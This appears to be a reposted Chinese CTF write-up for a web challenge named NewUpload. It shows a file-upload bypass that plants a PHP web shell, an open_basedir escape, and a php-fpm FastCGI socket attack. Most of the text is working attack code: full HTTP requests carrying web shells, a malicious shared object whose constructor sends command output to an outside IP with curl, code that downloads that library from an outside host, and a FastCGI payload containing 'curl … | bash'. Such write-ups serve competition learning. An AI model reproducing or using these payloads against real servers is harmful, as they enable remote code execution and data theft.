西湖论剑Web之NewUpload

admin

139164
文章

114
评论

2020年10月9日10:58:01评论359 views字数 5308阅读17分41秒阅读模式

西湖论剑Web之NewUpload

文章来源：EDI安全

文件名14.npnhnp绕过，用个deskop.ini做一下污染写马。

POST /sandbox/i9pkda6liup7jd81uouov1agud/index.php HTTP/1.1Host: upload.f28a18.challenge.gcsis.cnUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------31678586230937453831944973480Content-Length: 561Origin: http://upload.f28a18.challenge.gcsis.cnConnection: closeReferer: http://upload.f28a18.challenge.gcsis.cn/sandbox/i9pkda6liup7jd81uouov1agud/index.phpCookie: PHPSESSID=i9pkda6liup7jd81uouov1agud; dasctf_sign_cookie=19a5c3663736071e6e03dec07fccc64a; dasctf_sign_javascript=ac0efff678a5740be048702812fb377aUpgrade-Insecure-Requests: 1
-----------------------------31678586230937453831944973480Content-Disposition: form-data; name="file"; filename="14.php"Content-Type: image/jpeg
ï¿½ï¿½[.ShellClassInfo]LocalizedResourceName=@%SystemRoot%system32shell32.dll,-21770IconResource=%SystemRoot%system32imageres.dll,-112IconFile=%SystemRoot%system32shell32.dllIconIndex=-235
<? $_GET[0]($_GET[1]); phpinfo();?>

-----------------------------31678586230937453831944973480--

西湖论剑Web之NewUpload

读取index 没啥东西

http://upload.f28a18.challenge.gcsis.cn/sandbox/i9pkda6liup7jd81uouov1agud/upload/15.php?0=readfile&1=../index.php&dir=.

西湖论剑Web之NewUpload

有open_basedir限制先绕一下读取目录看看

<?phpmkdir('suanve');chdir('suanve');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(scandir("../../../../../../../../../../../../../".$_GET['dir']));

http://upload.f28a18.challenge.gcsis.cn/sandbox/i9pkda6liup7jd81uouov1agud/upload/i.php?dir=../

西湖论剑Web之NewUpload

flag在/flag 读取一下

<?phpmkdir('suanve');chdir('suanve');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo file_get_contents($_GET['file']);

直接读flag没权限

西湖论剑Web之NewUpload

readflag 是cat /flag


还是要执行命令 分析下phpinfo发现php-fpm

列tmp目录发现sock文件

参考
https://www.anquanke.com/post/id/186186#h3-5https://skysec.top/2019/06/10/2019%200ctf%20final%20Web%20Writeup%EF%BC%881%EF%BC%89/


服务器放置so
#define _GNU_SOURCE#include <stdlib.h>#include <stdio.h>#include <string.h>__attribute__ ((__constructor__)) void preload (void){    system("curl 123.56.22.0:6666/`/readflag`");}

gcc hpdoger.c -fPIC -shared -o hpdoger.so








POST /sandbox/i9pkda6liup7jd81uouov1agud/index.php HTTP/1.1Host: upload.f28a18.challenge.gcsis.cnUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------31678586230937453831944973480Content-Length: 1819Origin: http://upload.f28a18.challenge.gcsis.cnConnection: closeReferer: http://upload.f28a18.challenge.gcsis.cn/sandbox/i9pkda6liup7jd81uouov1agud/index.phpCookie: PHPSESSID=i9pkda6liup7jd81uouov1agud; dasctf_sign_cookie=19a5c3663736071e6e03dec07fccc64a; dasctf_sign_javascript=ac0efff678a5740be048702812fb377aUpgrade-Insecure-Requests: 1
-----------------------------31678586230937453831944973480Content-Disposition: form-data; name="file"; filename="s.php"Content-Type: image/jpeg
ï¿½ï¿½[.ShellClassInfo]LocalizedResourceName=@%SystemRoot%system32shell32.dll,-21770IconResource=%SystemRoot%system32imageres.dll,-112IconFile=%SystemRoot%system32shell32.dllIconIndex=-235<?  mkdir('suanve');chdir('suanve');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');//var_dump(scandir("../../../../../../../../../../../../../tmp"));echo copy("http://123.56.22.0:9999/hpdoger.so","/tmp/sky.so");
$fp = stream_socket_client("unix:///tmp/php-cgi-74.sock", $errno, $errstr,30);$out = urldecode("%01%01%1C%AE%00%08%00%00%00%01%00%00%00%00%00%00%01%04%1C%AE%01%DC%00%00%0E%02CONTENT_LENGTH51%0C%10CONTENT_TYPEapplication/text%0B%04REMOTE_PORT9985%0B%09SERVER_NAMElocalhost%11%0BGATEWAY_INTERFACEFastCGI/1.0%0F%0ESERVER_SOFTWAREphp/fcgiclient%0B%09REMOTE_ADDR127.0.0.1%0F%17SCRIPT_FILENAME/var/www/html/index.php%0B%17SCRIPT_NAME/var/www/html/index.php%09%1FPHP_VALUEauto_prepend_file%20%3D%20php%3A//input%0E%04REQUEST_METHODPOST%0B%02SERVER_PORT80%0F%08SERVER_PROTOCOLHTTP/1.1%0C%00QUERY_STRING%0F%17PHP_ADMIN_VALUEextension%20%3D%20/tmp/sky.so%0D%01DOCUMENT_ROOT/%0B%09SERVER_ADDR127.0.0.1%0B%17REQUEST_URI/var/www/html/index.php%01%04%1C%AE%00%00%00%00%01%05%1C%AE%003%00%00%3C%3Fphp%20hello_world%28%27curl%20106.14.114.127%20%7C%20bash%27%29%3B%20%3F%3E%01%05%1C%AE%00%00%00%00");stream_socket_sendto($fp,$out);while (!feof($fp)) {echo htmlspecialchars(fgets($fp, 10)); }fclose($fp);//'

?>
-----------------------------31678586230937453831944973480--







访问




http://upload.f28a18.challenge.gcsis.cn/sandbox/i9pkda6liup7jd81uouov1agud/upload/s.php


















推荐文章++++





*常见web中间件拿shell

*Webshell 高级样本收集